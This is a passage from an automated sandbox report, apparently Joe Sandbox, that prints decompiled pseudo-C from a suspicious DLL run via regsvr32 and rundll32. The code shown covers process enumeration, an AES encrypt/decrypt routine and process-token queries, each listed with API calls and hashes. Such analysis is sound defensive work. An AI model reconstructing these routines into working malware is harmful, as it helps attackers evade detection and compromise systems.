                    0x04f92ad7
                    0x04f92b08
                    0x04f92ade
                    0x04f92ae3
                    0x04f92af0
                    0x04f92af9
                    0x04f92b10
                    0x04f92afb
                    0x04f92b03
                    0x00000000
                    0x04f92b03
                    0x04f92b11
                    0x04f92b12
                    0x00000000
                    0x04f92b12
                    0x00000000
                    0x04f92b0c
                    0x04f92b18
                    0x04f92b1d

                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04F92AC4
                    • Process32First.KERNEL32(00000000,?), ref: 04F92AD7
                    • Process32Next.KERNEL32(00000000,?), ref: 04F92B03
                    • CloseHandle.KERNEL32(00000000), ref: 04F92B12
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: 65179fc1902c59a2425fffb8ed1f2a54726d9e2fc5eb914828dbf126b0224108
                    • Instruction ID: 445d5dd784d0329b2db0d51815e3667b7167bdfeb422bee0e35e6088fa179305
                    • Opcode Fuzzy Hash: 65179fc1902c59a2425fffb8ed1f2a54726d9e2fc5eb914828dbf126b0224108
                    • Instruction Fuzzy Hash: C9F06232A011287AFF21AF25AC49DEB37ECDB85214B020491F915D3000EA24AD878AA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F96156 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04F96156(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                    0x04f96160
                    0x04f96164
                    0x04f96179
                    0x04f9617d
                    0x04f96180
                    0x04f96186
                    0x04f9618a
                    0x04f9618d
                    0x04f96198
                    0x04f9618f
                    0x04f9618f
                    0x04f9618f
                    0x04f9618d
                    0x04f961a6

                    APIs
                    • memset.NTDLL ref: 04F96164
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 04F96179
                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04F96186
                    • CloseHandle.KERNEL32(?), ref: 04F96198
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: CreateEvent$CloseHandlememset
                    • String ID:
                    • API String ID: 2812548120-0
                    • Opcode ID: 228db007bf6b4dc088778f581b3f78a98f269dd9b7e714163678b183749c3e8f
                    • Instruction ID: a23791e2a2674916700e5c4466887fa8e2ad9eb5e1509a9e9cee5e71d61ec5b9
                    • Opcode Fuzzy Hash: 228db007bf6b4dc088778f581b3f78a98f269dd9b7e714163678b183749c3e8f
                    • Instruction Fuzzy Hash: CEF03AF150430C7FF6105F22EC80C27BBACFB812D8B12492DB14681111DA76BC568A70
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F9137B Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04F9137B() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x4f9a30c; // 0x2e8
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x4f9a358; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x4f9a30c; // 0x2e8
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x4f9a2d8; // 0x56d0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                    0x04f9137b
                    0x04f91382
                    0x04f913cc
                    0x04f913ce
                    0x04f913ce
                    0x04f91386
                    0x04f9138c
                    0x04f91391
                    0x04f91395
                    0x04f9139b
                    0x04f913a2
                    0x00000000
                    0x00000000
                    0x04f913a4
                    0x04f913a9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f913a9
                    0x04f913ab
                    0x04f913b3
                    0x04f913b6
                    0x04f913b6
                    0x04f913bc
                    0x04f913c3
                    0x04f913c6
                    0x04f913c6
                    0x00000000

                    APIs
                    • SetEvent.KERNEL32(000002E8,00000001,04F910AA), ref: 04F91386
                    • SleepEx.KERNEL32(00000064,00000001), ref: 04F91395
                    • CloseHandle.KERNEL32(000002E8), ref: 04F913B6
                    • HeapDestroy.KERNEL32(056D0000), ref: 04F913C6
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: CloseDestroyEventHandleHeapSleep
                    • String ID:
                    • API String ID: 4109453060-0
                    • Opcode ID: 0a565e80f3cfd1cafcd59127a21ca460cdfbc997a232cc19000c36fa294a0826
                    • Instruction ID: 225df298d30ef2b175da97de5f868a98e33d44e376faee40989d0c903ccd6b3b
                    • Opcode Fuzzy Hash: 0a565e80f3cfd1cafcd59127a21ca460cdfbc997a232cc19000c36fa294a0826
                    • Instruction Fuzzy Hash: F8F01C75F01256ABFB30AB35F948F563BF8EB04761B050628BC61D2791DE69EC409960
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F95231 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memorytimeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04F95231(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E04F95406(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000;
					_t20 = E04F915E6(__ecx, _a4, _a8, _t23);
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E04F95B98(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0x4f9a2d8, 0, _t23);
				}
				return _t20;
			}









                    0x04f95231
                    0x04f95242
                    0x04f95246
                    0x04f9529f
                    0x04f95248
                    0x04f9524f
                    0x04f95255
                    0x04f9525e
                    0x04f95262
                    0x04f95268
                    0x04f95278
                    0x04f9528a
                    0x04f9528a
                    0x04f95295
                    0x04f95295
                    0x04f952a6

                    APIs
                      • Part of subcall function 04F95406: lstrlen.KERNEL32(?,00000000,05AC9D58,00000000,04F93C77,05AC9F7B,69B25F44,?,?,?,?,69B25F44,00000005,04F9A00C,4D283A53,?), ref: 04F9540D
                      • Part of subcall function 04F95406: mbstowcs.NTDLL ref: 04F95436
                      • Part of subcall function 04F95406: memset.NTDLL ref: 04F95448
                    • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,05AC93CC), ref: 04F95268
                    • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,05AC93CC), ref: 04F95295
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                    • String ID: Ut
                    • API String ID: 1500278894-8415677
                    • Opcode ID: 2fe438494106eeef1a014a210e74087de8f6f32146af52d87a2b94ffefa9b0ba
                    • Instruction ID: e80a605500bbd7e0ca210b5b79d9d2371c2645b8273dd879e9b881189b6d0234
                    • Opcode Fuzzy Hash: 2fe438494106eeef1a014a210e74087de8f6f32146af52d87a2b94ffefa9b0ba
                    • Instruction Fuzzy Hash: 82014F32600209BBEF125F94EC44E9B7BB9FB84744F504429FA009A160EBB1ED66D760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F9395B Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 58%
                    			E04F9395B(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04F963FD(_t2);
				if(_t34 != 0) {
					_t30 = E04F963FD(_t28);
					if(_t30 == 0) {
						E04F917AB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E04F9799A(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E04F9799A(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                    0x04f9395b
                    0x04f93965
                    0x04f93967
                    0x04f9396d
                    0x04f9396d
                    0x04f93976
                    0x04f9397a
                    0x04f93986
                    0x04f9398a
                    0x04f939fe
                    0x04f9398c
                    0x04f9398c
                    0x04f93990
                    0x04f93997
                    0x04f9399a
                    0x04f939b4
                    0x04f939a3
                    0x04f939a3
                    0x04f939a7
                    0x04f939aa
                    0x04f939af
                    0x04f939af
                    0x04f939b9
                    0x04f939e1
                    0x04f939e7
                    0x04f939ea
                    0x04f939bb
                    0x04f939bd
                    0x04f939c5
                    0x04f939d0
                    0x04f939d5
                    0x04f939d5
                    0x04f939f1
                    0x04f939f8
                    0x04f939f9
                    0x04f939f9
                    0x04f9398a
                    0x04f93a09

                    APIs
                    • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,04F943F7,?,?,?,?,00000102,04F91AE3,?,?,00000000), ref: 04F93967
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                      • Part of subcall function 04F9799A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04F93995,00000000,00000001,00000001,?,?,04F943F7,?,?,?,?,00000102), ref: 04F979A8
                      • Part of subcall function 04F9799A: StrChrA.SHLWAPI(?,0000003F,?,?,04F943F7,?,?,?,?,00000102,04F91AE3,?,?,00000000,00000000), ref: 04F979B2
                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F943F7,?,?,?,?,00000102,04F91AE3,?), ref: 04F939C5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04F939D5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04F939E1
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                    • String ID:
                    • API String ID: 3767559652-0
                    • Opcode ID: a3e7c82282d9a20c09104b737c42c83bcbd3242513caf24ca3f46694f75f4d5c
                    • Instruction ID: c236400db6046611674019730c4ccc1d38a021949de271df1c663a217ae76256
                    • Opcode Fuzzy Hash: a3e7c82282d9a20c09104b737c42c83bcbd3242513caf24ca3f46694f75f4d5c
                    • Instruction Fuzzy Hash: 11219D72900259BBFF029F69CC44BAEBFF9DF09244B054058ED049B201E635ED06C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F9114D Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04F9114D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04F963FD(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                    0x04f91162
                    0x04f91166
                    0x04f91170
                    0x04f91177
                    0x04f9117a
                    0x04f9117c
                    0x04f91184
                    0x04f91189
                    0x04f91197
                    0x04f9119c
                    0x04f911a6

                    APIs
                    • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,05AC93CC,?,04F93418,004F0053,05AC93CC,?,?,?,?,?,?,04F954F9), ref: 04F9115D
                    • lstrlenW.KERNEL32(04F93418,?,04F93418,004F0053,05AC93CC,?,?,?,?,?,?,04F954F9), ref: 04F91164
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,04F93418,004F0053,05AC93CC,?,?,?,?,?,?,04F954F9), ref: 04F91184
                    • memcpy.NTDLL(74E069A0,04F93418,00000002,00000000,004F0053,74E069A0,?,?,04F93418,004F0053,05AC93CC), ref: 04F91197
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: lstrlenmemcpy$AllocateHeap
                    • String ID:
                    • API String ID: 2411391700-0
                    • Opcode ID: 28f5ad390f142e9e9a2f07c73c0a4f90a9c083aa60e1fe3ad3a79d8c2acfe455
                    • Instruction ID: 2e406c9fd6c7cb73ec65bba140c97f7e1649be69e51984d55bfed461bc04146c
                    • Opcode Fuzzy Hash: 28f5ad390f142e9e9a2f07c73c0a4f90a9c083aa60e1fe3ad3a79d8c2acfe455
                    • Instruction Fuzzy Hash: 2AF04F72900118BBEF11DFA9CC44C9E7BECEF08358B014062E908D7211E731EE158BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F9252A Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlen.KERNEL32(05AC9B50,00000000,00000000,7691C740,04F96AE6,00000000), ref: 04F9253A
                    • lstrlen.KERNEL32(?), ref: 04F92542
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • lstrcpy.KERNEL32(00000000,05AC9B50), ref: 04F92556
                    • lstrcat.KERNEL32(00000000,?), ref: 04F92561
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                    • String ID:
                    • API String ID: 74227042-0
                    • Opcode ID: 3eaed05a9ccc4b0981076980f64e42b3cb3a8e00da4f2cf74e8ad08e08d4b5aa
                    • Instruction ID: 60019a3df89eb4b47f9a9b3fa1deb3dcc9e9fb896db9201474247a28021ea267
                    • Opcode Fuzzy Hash: 3eaed05a9ccc4b0981076980f64e42b3cb3a8e00da4f2cf74e8ad08e08d4b5aa
                    • Instruction Fuzzy Hash: B1E09273901264779B119BF9BC48CAFBBACFF89610709041AFA10D3210CB699C12CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    Function 04214872 Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 135 4214872-42148b2 CryptAcquireContextW 136 4214a09-4214a0f GetLastError 135->136 137 42148b8-42148f4 memcpy CryptImportKey 135->137 138 4214a12-4214a19 136->138 139 42149f4-42149fa GetLastError 137->139 140 42148fa-421490c CryptSetKeyParam 137->140 141 42149fd-4214a07 CryptReleaseContext 139->141 142 42149e0-42149e6 GetLastError 140->142 143 4214912-421491b 140->143 141->138 146 42149e9-42149f2 CryptDestroyKey 142->146 144 4214923-4214930 call 42163fd 143->144 145 421491d-421491f 143->145 150 42149d7-42149de 144->150 151 4214936-421493f 144->151 145->144 147 4214921 145->147 146->141 147->144 150->146 152 4214942-421494a 151->152 153 421494c 152->153 154 421494f-421496c memcpy 152->154 153->154 155 4214987-4214996 CryptDecrypt 154->155 156 421496e-4214985 CryptEncrypt 154->156 157 421499c-421499e 155->157 156->157 158 42149a0-42149aa 157->158 159 42149ae-42149b9 GetLastError 157->159 158->152 160 42149ac 158->160 161 42149bb-42149cb 159->161 162 42149cd-42149d5 call 42117ab 159->162 160->161 161->146 162->146
                    C-Code - Quality: 58%
                    			E04214872(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x421a0e4( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x421a0c4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x11f
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E042163FD(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x421a0c8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E042117AB(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                    0x0421487b
                    0x04214881
                    0x04214884
                    0x0421488a
                    0x0421488a
                    0x0421488c
                    0x0421488e
                    0x04214891
                    0x04214897
                    0x04214898
                    0x04214899
                    0x0421489f
                    0x042148a4
                    0x042148aa
                    0x042148b2
                    0x04214a0f
                    0x042148b8
                    0x042148ba
                    0x042148c3
                    0x042148c8
                    0x042148da
                    0x042148dd
                    0x042148e1
                    0x042148e8
                    0x042148ec
                    0x042148f4
                    0x042149fa
                    0x042148fa
                    0x042148fa
                    0x042148fe
                    0x042148ff
                    0x04214901
                    0x0421490c
                    0x042149e6
                    0x04214912
                    0x04214912
                    0x04214915
                    0x0421491b
                    0x04214921
                    0x04214921
                    0x04214929
                    0x0421492d
                    0x04214930
                    0x042149d7
                    0x04214936
                    0x0421493c
                    0x0421493f
                    0x04214942
                    0x04214944
                    0x04214947
                    0x0421494a
                    0x0421494c
                    0x0421494c
                    0x04214956
                    0x0421495b
                    0x0421495e
                    0x04214961
                    0x04214963
                    0x0421496c
                    0x04214996
                    0x0421496e
                    0x0421497f
                    0x0421497f
                    0x0421499e
                    0x00000000
                    0x00000000
                    0x042149a0
                    0x042149a3
                    0x042149a6
                    0x042149aa
                    0x00000000
                    0x042149ac
                    0x042149bb
                    0x042149c1
                    0x042149c9
                    0x042149c9
                    0x00000000
                    0x042149aa
                    0x042149ae
                    0x042149b6
                    0x042149b9
                    0x042149d0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x042149b9
                    0x04214930
                    0x042149e9
                    0x042149ec
                    0x042149ec
                    0x04214a01
                    0x04214a01
                    0x04214a19

                    APIs
                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04213AC6), ref: 042148AA
                    • memcpy.NTDLL(?,04213AC6,00000010,?,?,?,?,?,?,?,?,?,?,042160F5,00000000,04214DD9), ref: 042148C3
                    • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 042148EC
                    • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04214904
                    • memcpy.NTDLL(00000000,04214DD9,04213AC6,0000011F), ref: 04214956
                    • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04213AC6,00000020,?,?,0000011F), ref: 0421497F
                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04213AC6,?,?,0000011F), ref: 04214996
                    • GetLastError.KERNEL32(?,?,0000011F), ref: 042149AE
                    • GetLastError.KERNEL32 ref: 042149E0
                    • CryptDestroyKey.ADVAPI32(?), ref: 042149EC
                    • GetLastError.KERNEL32 ref: 042149F4
                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04214A01
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,042160F5,00000000,04214DD9,04213AC6,?,04213AC6), ref: 04214A09
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                    • String ID:
                    • API String ID: 1967744295-0
                    • Opcode ID: 794f83e66b8f36519a683b37d9085566b452abd95adb9d10a8cb0b8f09d1b230
                    • Instruction ID: 26a2912d317cffc633b0689d9bfc5a1ed031e24a928f741e4dbf9884e229f1a3
                    • Opcode Fuzzy Hash: 794f83e66b8f36519a683b37d9085566b452abd95adb9d10a8cb0b8f09d1b230
                    • Instruction Fuzzy Hash: 5A516CB1A10209FFDF10EFA8DC88AAEBBF8EB14350F104465F919E6160D774AE54DB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 042177BB Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 38%
                    			E042177BB(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E042163FD(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E042117AB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                    0x042177c8
                    0x042177c9
                    0x042177ca
                    0x042177cb
                    0x042177cc
                    0x042177d0
                    0x042177d7
                    0x042177e6
                    0x042177e9
                    0x042177ec
                    0x042177f3
                    0x042177f6
                    0x042177f9
                    0x042177fc
                    0x042177ff
                    0x0421780a
                    0x0421780c
                    0x04217815
                    0x0421781d
                    0x0421781f
                    0x04217831
                    0x0421783b
                    0x0421783f
                    0x0421784e
                    0x04217852
                    0x0421785b
                    0x04217863
                    0x04217863
                    0x04217865
                    0x04217865
                    0x0421786d
                    0x04217873
                    0x04217877
                    0x04217877
                    0x04217882

                    APIs
                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04217802
